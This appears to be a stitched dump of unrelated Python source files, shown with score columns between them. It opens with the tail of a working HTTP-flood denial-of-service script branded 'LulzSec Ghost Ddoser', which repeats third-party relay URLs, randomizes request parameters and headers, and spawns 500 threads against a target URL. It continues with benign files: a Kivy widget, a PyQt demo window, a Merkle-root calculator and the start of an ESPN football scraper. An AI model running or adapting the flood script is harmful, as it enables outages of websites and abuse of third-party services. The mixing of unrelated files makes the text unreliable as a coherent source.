bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
return(bots)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def usage():
print 'Pra usar python Lulz.py <url>'
print 'LulzSec Ghost Ddoser By V3I0p3r'
print 'Script Priv8 Privada da LulzSec Ghost'
print "\a"
print \
""" .
_____|\
_.--| LOL |:
<____|.----||
.---''---,
The ;..__..' _...
Lulz ,'/ ;|/..--'' \
Boat ,'_/.-/': :
_..-'''/ / | \ \ _|/|
\ /-./_ \; \ \,;' \
,\ / \: `:\ \ // `:`.
,' \ /-._; | : : :: ,. .
,' :: /`-._| | | || ' : `.`.)
_,' |;._:: | | | | `| : `'
,' `. / |`-:_ ; | | | : \
`--. ) /|-._: : | \ \
/ / :_| ;`-._; __..--'; : :
/ ( ;|;-./_ _/.-:'o | / ' |
/ , \._/_/_./--''/_|:|___|_,' |
: / `'-'--'----'---------' |
| : O ._O O_. O ._O O_. ; ;
: `. // // // // ,' /
~~~`.______//____//____//____//_______,'~
// //~ // //
~~ _// _// _// ~ _// ~
~ / / / / / / / / ~ ~~
~~~ ~~~ ~~~ ~~~
"""
#http request
def httpcall(url):
useragent_list()
referer_list()
code=0
if url.count("?")>0:
param_joiner="&"
else:
param_joiner="?"
request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
request.add_header('Keep-Alive', random.randint(110,120))
request.add_header('Connection', 'keep-alive')
request.add_header('Host',host)
try:
urllib2.urlopen(request)
except urllib2.HTTPError, e:
#print e.code
set_flag(1)
print '[+]~>LULZ ATTACK STARTRD<~'
print '[+]~~>LULZ ATTACK STARTRD<~~[+] '
code=500
except urllib2.URLError, e:
#print e.reason
sys.exit()
else:
inc_counter()
urllib2.urlopen(request)
return(code)
#http caller thread
class HTTPThread(threading.Thread):
def run(self):
try:
while flag<2:
code=httpcall(url)
if (code==800) & (safe==1):
set_flag(2)
except Exception, ex:
pass
# monitors http threads and counts requests
class MonitorThread(threading.Thread):
def run(self):
previous=request_counter
while flag==0:
if (previous+500<request_counter) & (previous<>request_counter):
print "%d lULZ Up" % (request_counter)
previous=request_counter
if flag==2:
print "\n -lULZ Finish"
#execute
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1]=="help":
usage()
sys.exit()
else:
print "Script Priv8 Privada da LulzSec Ghost"
if len(sys.argv)== 3:
if sys.argv[2]=="safe":
set_safe()
url = sys.argv[1]
if url.count("/")==2:
url = url + "/"
m = re.search('http\://([^/]*)/?.*', url)
host = m.group(1)
for i in range(500):
t = HTTPThread()
t.start()
t = MonitorThread()
t.start()
| 1.304688 | 1 |
build/lib/abp/adaptives/a3c/__init__.py | LinearZoetrope/abp | 0 | 12797472 | <reponame>LinearZoetrope/abp<filename>build/lib/abp/adaptives/a3c/__init__.py
from .adaptive import A2CAdaptive
| 0.285156 | 0 |
bglib/kvui/rootwidget.py | dheller1/bglib | 0 | 12797480 | <gh_stars>0
from kivy.uix.widget import Widget
from kivy.uix.floatlayout import FloatLayout
class RootWidget(FloatLayout):
def __init__(self, **kwargs):
super().__init__(**kwargs)
| 1.320313 | 1 |
pyqt_demo/test1.py | yzwxx/Label_Lab | 0 | 12797488 | <reponame>yzwxx/Label_Lab<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
a window with menu bar and tool bar
QAction with addAction for event handling(setting hot keys,showing status tip)
set window icon
'''
import os
from os.path import join
import sys
from PyQt4 import QtGui,QtCore
icon_path = join(os.getcwd(),'icon.png')
class Example1(QtGui.QMainWindow):
    """Demo main window: menu bar, two tool bars, buttons and a status bar."""
    def __init__(self):
        """Build the window and show it."""
        super(Example1, self).__init__()
        self.initUI()
    def initUI(self):
        """Create all widgets and wire their signals."""
        # text edit
        textEdit = QtGui.QTextEdit()
        self.setCentralWidget(textEdit)
        # menubar's action
        exitAction = QtGui.QAction('&Exit', self)
        exitAction.setShortcut('Ctrl+Q')
        exitAction.setStatusTip('Exit application')
        exitAction.triggered.connect(QtGui.QApplication.quit)
        self.statusBar().showMessage('Ready')
        # menubar (non-native so it shows inside the window on macOS too)
        menubar = self.menuBar()
        menubar.setNativeMenuBar(False)
        fileMenu = menubar.addMenu('&File')
        fileMenu.addAction(exitAction) # binding the action to the menu in menubar
        # toolbar (icon above text)
        self.toolbar = QtGui.QToolBar('name')
        self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
        self.toolbar.addAction(exitAction)
        self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar)
        # second toolbar (icon beside text) sharing the same action
        self.toolbar2 = QtGui.QToolBar('name')
        self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon)
        self.toolbar2.addAction(exitAction)
        self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2)
        self.setGeometry(500, 300, 550, 350) # set location of app windows on screen and its size
        self.setWindowTitle('GUI Demo')
        # window icon
        self.setWindowIcon(QtGui.QIcon(icon_path))
        # tooltip
        # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10))
        # self.setToolTip('This is a <b>QWidget</b> widget')
        # create buttons
        btn = QtGui.QPushButton('Button', self)
        # btn.setToolTip('This is a <b>QPushButton</b> widget')
        btn.resize(btn.sizeHint())
        btn.move(0, 300)
        qbtn = QtGui.QPushButton('Quit', self)
        qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit)
        qbtn.resize(qbtn.sizeHint())
        qbtn.move(100, 300)
        # status bar
        # self.statusBar().showMessage('Ready')
        # self.statusBar().showMessage('not Ready')
        # center the window on screen
        self.center()
        self.show()
    def closeEvent(self, event):
        """Ask for confirmation before closing the window."""
        reply = QtGui.QMessageBox.question(self, 'Message',
            "Are you sure to quit?", QtGui.QMessageBox.Yes |
            QtGui.QMessageBox.No, QtGui.QMessageBox.No)
        if reply == QtGui.QMessageBox.Yes:
            event.accept()
        else:
            event.ignore()
    def center(self):
        """Move the window to the center of the available screen area."""
        qr = self.frameGeometry()
        cp = QtGui.QDesktopWidget().availableGeometry().center()
        qr.moveCenter(cp)
        self.move(qr.topLeft())
def main():
    """Create the Qt application, show the demo window and run the event loop."""
    app = QtGui.QApplication(sys.argv) # Every PyQt4 application must create an application object
    #print sys.argv[1:]
    ex = Example1()  # keep a reference so the window is not garbage-collected
    sys.exit(app.exec_()) # The event handling starts from this point
if __name__ == '__main__':
main() | 2.046875 | 2 |
merkle.py | makiolo/root_merkle_tree | 2 | 12797496 | <filename>merkle.py<gh_stars>1-10
'''
Generate root merkle tree hash in python.
I use https://github.com/bitcoin/bitcoin as reference:
	BlockBuildMerkleTree --> Satoshi implmentation
	BlockMerkleRoot ---> new bitcoin core implementation
'''
import pandas as pd
from hashlib import sha256
from io import StringIO


def merkle_root(leaf_hashes):
    """Return the Merkle root of *leaf_hashes* (a list of hex digest strings).

    Follows the Satoshi/bitcoin convention: when a level has an odd number of
    nodes, the last node is paired with itself.

    Args:
        leaf_hashes: non-empty list of hex digests (one per transaction).

    Returns:
        str: hex digest of the tree root.

    Raises:
        ValueError: if *leaf_hashes* is empty.
    """
    if not leaf_hashes:
        raise ValueError("cannot compute the Merkle root of an empty list")
    level = list(leaf_hashes)  # copy: do not mutate the caller's list
    while len(level) > 1:
        if len(level) % 2 != 0:
            level.append(level[-1])  # duplicate last node on odd-sized levels
        level = [
            sha256((left + right).encode('utf-8')).hexdigest()
            for left, right in zip(level[::2], level[1::2])
        ]
    return level[0]


# Worked example for four leaves:
# h( h(1) + h(2) )
# 0df4085b3a65bd26ca6ab608c0f70c41213f77e56bc5b33bd9899db5d39a7cd8
# h( h(3) + h(4) )
# b26c7b49a69fe9a789facdaaad0af0bac4cd588db345d297f03359a5e40d73d2
# h( h( h(1) + h(2) ) + h( h(3) + h(4) ) )
# 93b46a24b0a418c5f6c31b4058dc5d0f3338a30951d3b4b5a74e9072f145c766

dataset = StringIO("""\
transaction1_serialized_A_B_3
transaction2_serialized_B_C_1
transaction3_serialized_D_E_2
transaction4_serialized_E_B_1
transaction5_serialized_C_B_2
transaction6_serialized_D_A_1
""")

df = pd.read_csv(dataset, encoding='utf-8', header=None)
leaf_hashes = df.iloc[:, 0].apply(lambda x: sha256(x.encode('utf-8')).hexdigest()).tolist()
# tree condensed in a hash
print(merkle_root(leaf_hashes))
| 1.898438 | 2 |
nfl/espn.py | sansbacon/nfl | 2 | 12797504 | """
# espn.py
# classes for scraping, parsing espn football data
# this does include some basic fantasy data
# espn_fantasy is mostly about managing fantasy teams
# NOTE: trouble accessing data in offseason
# will have to revisit this module as season approaches
"""
import logging
import re
from bs4 import BeautifulSoup, NavigableString, Tag
from namematcher.xref import Site
from sportscraper.scraper import RequestScraper
# ESPN fantasy API numeric team id -> team abbreviation.
# Note the gap: ids 31/32 are unused; 33 = Baltimore, 34 = Houston.
FANTASY_TEAMS = {
    1: "Atl",
    2: "Buf",
    3: "Chi",
    4: "Cin",
    5: "Cle",
    6: "Dal",
    7: "Den",
    8: "Det",
    9: "GB",
    10: "Ten",
    11: "Ind",
    12: "KC",
    13: "Oak",
    14: "LAR",
    15: "Mia",
    16: "Min",
    17: "NE",
    18: "NO",
    19: "NYG",
    20: "NYJ",
    21: "Phi",
    22: "Ari",
    23: "Pit",
    24: "LAC",
    25: "SF",
    26: "Sea",
    27: "TB",
    28: "Wsh",
    29: "Car",
    30: "Jax",
    33: "Bal",
    34: "Hou",
}
class Scraper(RequestScraper):
    """
    Scrape ESPN.com for football stats
    """

    # slot category ids used by the ESPN fantasy endpoints, keyed by position;
    # shared by projections() and weekly_scoring()
    SLOT_CATEGORIES = {"qb": 0, "rb": 2, "wr": 4, "te": 6, "dst": 16, "k": 17}

    @staticmethod
    def _check_pos(pos):
        """
        Makes sure pos is valid and uppercase

        Args:
            pos(str): position abbreviation, e.g. 'qb', 'DST', 'd/st'

        Returns:
            str: normalized position ('QB', 'RB', 'WR', 'TE', 'K' or 'D/ST')

        Raises:
            ValueError: if pos is not a recognized position
        """
        normalized = pos.lower()
        if normalized in ("qb", "rb", "wr", "te", "k"):
            return pos.upper()
        if normalized in ("dst", "d/st"):
            # both spellings collapse to ESPN's canonical 'D/ST'
            return "D/ST"
        raise ValueError("invalid position: {}".format(pos))

    def adp(self, season_year):
        """
        Gets adp data

        Args:
            season_year(int): 2019, etc.

        Returns:
            dict: parsed JSON
        """
